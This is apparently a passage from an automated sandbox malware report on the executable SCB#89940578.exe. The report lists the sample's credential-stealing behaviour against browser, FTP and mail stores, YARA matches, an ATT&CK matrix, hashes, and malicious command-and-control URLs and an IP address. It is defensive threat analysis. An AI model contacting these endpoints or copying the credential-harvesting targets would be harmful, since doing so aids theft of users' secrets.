                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SCB#89940578.exe PID: 7112, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: SCB#89940578.exe PID: 7272, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.7be0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.3b19970.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: PopPassword2_2_0040D069
                      Source: C:\Users\user\Desktop\SCB#89940578.exeCode function: SmtpPassword2_2_0040D069
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.4756290.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.473c270.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.SCB#89940578.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.SCB#89940578.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.46e0650.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.4684a30.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1705748032.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000004756000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.7be0000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.3b19970.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.7be0000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SCB#89940578.exe.3b19970.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1706474563.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1709326341.0000000007BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      1
                      Masquerading
                      2
                      OS Credential Dumping
                      21
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
                      Process Injection
                      1
                      Disable or Modify Tools
                      2
                      Credentials in Registry
                      41
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading
                      41
                      Virtualization/Sandbox Evasion
                      Security Account Manager1
                      File and Directory Discovery
                      SMB/Windows Admin Shares2
                      Data from Local System
                      1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Access Token Manipulation
                      NTDS13
                      System Information Discovery
                      Distributed Component Object ModelInput Capture111
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                      Process Injection
                      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Deobfuscate/Decode Files or Information
                      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                      Obfuscated Files or Information
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      SCB#89940578.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                      http://alphastand.top/alien/fre.php100%URL Reputationmalware
                      http://www.ibsensoftware.com/0%URL Reputationsafe
                      http://www.ibsensoftware.com/0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://alphastand.win/alien/fre.php100%URL Reputationmalware
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                      https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/?ajax=posts.php0%Avira URL Cloudsafe
                      http://www.sakkal.comJ0%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/?feed=comments-rss20%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/index.php?rest_route=/0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/?ajax=posts.phpJ0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn0%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/?feed=rss20%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
                      http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
                      http://45.77.223.48/~blog/?ajax=posts.php0%VirustotalBrowse
                      http://45.77.223.48/~blog/index.php?rest_route=/0%VirustotalBrowse
                      http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                      http://www.founder.com.cn/cn0%VirustotalBrowse
                      http://www.zhongyicts.com.cn1%VirustotalBrowse
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://kbfvzoboss.bid/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      http://alphastand.top/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      http://45.77.223.48/~blog/?ajax=posts.phptrue
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://alphastand.win/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      http://alphastand.trade/alien/fre.phptrue
                      • URL Reputation: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.comSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.com/designersGSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://45.77.223.48/~blog/?feed=comments-rss2SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.fontbureau.com/designers/?SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://45.77.223.48/~blog/index.php?rest_route=/SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.founder.com.cn/cn/bTheSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designers?SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.ibsensoftware.com/SCB#89940578.exe, SCB#89940578.exe, 00000002.00000002.2811909354.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sakkal.comJSCB#89940578.exe, 00000000.00000002.1708357533.00000000054E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.w.org/SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.tiro.comSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.goodfont.co.krSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.chiark.greenend.org.uk/~sgtatham/putty/0SCB#89940578.exefalse
                                    • URL Reputation: safe
                                    unknown
                                    http://45.77.223.48/~blog/?ajax=posts.phpJSCB#89940578.exe, 00000002.00000002.2812221693.0000000000BE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.carterandcone.comlSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sajatypeworks.comSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.typography.netDSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/cabarga.htmlNSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/cTheSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.galapagosdesign.com/staff/dennis.htmSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers/frere-user.htmlSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://45.77.223.48/~blog/?feed=rss2SCB#89940578.exe, 00000002.00000002.2812320964.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, SCB#89940578.exe, 00000002.00000002.2812617875.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8SCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fonts.comSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.sandoll.co.krSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • 1%, Virustotal, Browse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.sakkal.comSCB#89940578.exe, 00000000.00000002.1708451706.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            45.77.223.48
                                            unknownUnited States
                                            20473AS-CHOOPAUStrue
                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1431960
                                            Start date and time:2024-04-26 04:41:06 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 12s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:SCB#89940578.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 67
                                            • Number of non-executed functions: 26
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            TimeTypeDescription
                                            04:41:59API Interceptor69x Sleep call for process: SCB#89940578.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            45.77.223.48Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                            • 45.77.223.48/~blog/?ajax=ee
                                            SCB99440721399.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                            • 45.77.223.48/~blog/?ajax=posts.php
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            AS-CHOOPAUSAwb# 1294440291; 2 ki_n; G.W 3.30 KG.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                            • 45.77.223.48
                                            SCB99440721399.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                            • 45.77.223.48
                                            pikabot_core.bin.exeGet hashmaliciousPikaBotBrowse
                                            • 45.32.188.56
                                            https://i.imgur.com/EoTj4iI.pngGet hashmaliciousUnknownBrowse
                                            • 155.138.160.21
                                            https://i.imgur.com/VlAllek.pngGet hashmaliciousUnknownBrowse
                                            • 155.138.160.21
                                            shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                            • 80.240.20.220
                                            Remittance. #U0440df.htmlGet hashmaliciousHTMLPhisherBrowse
                                            • 45.76.249.237
                                            NMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                                            • 44.40.187.94
                                            shipping document.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 80.240.20.220
                                            lS9yzwGRef.elfGet hashmaliciousMiraiBrowse
                                            • 44.174.121.50
                                            No context
                                            No context
                                            Process:C:\Users\user\Desktop\SCB#89940578.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1216
                                            Entropy (8bit):5.34331486778365
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\Desktop\SCB#89940578.exe
                                            File Type:very short file (no magic)
                                            Category:dropped
                                            Size (bytes):1
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3:U:U
                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:1
                                            Process:C:\Users\user\Desktop\SCB#89940578.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):46
                                            Entropy (8bit):1.0424600748477153
                                            Encrypted:false
                                            SSDEEP:3:/lbq:4
                                            MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                            SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                            SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                            SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:........................................user.
                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.951101400475959
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:SCB#89940578.exe
                                            File size:706'056 bytes
                                            MD5:8bdfe306f813ba1a65ecf6e1da4085c1
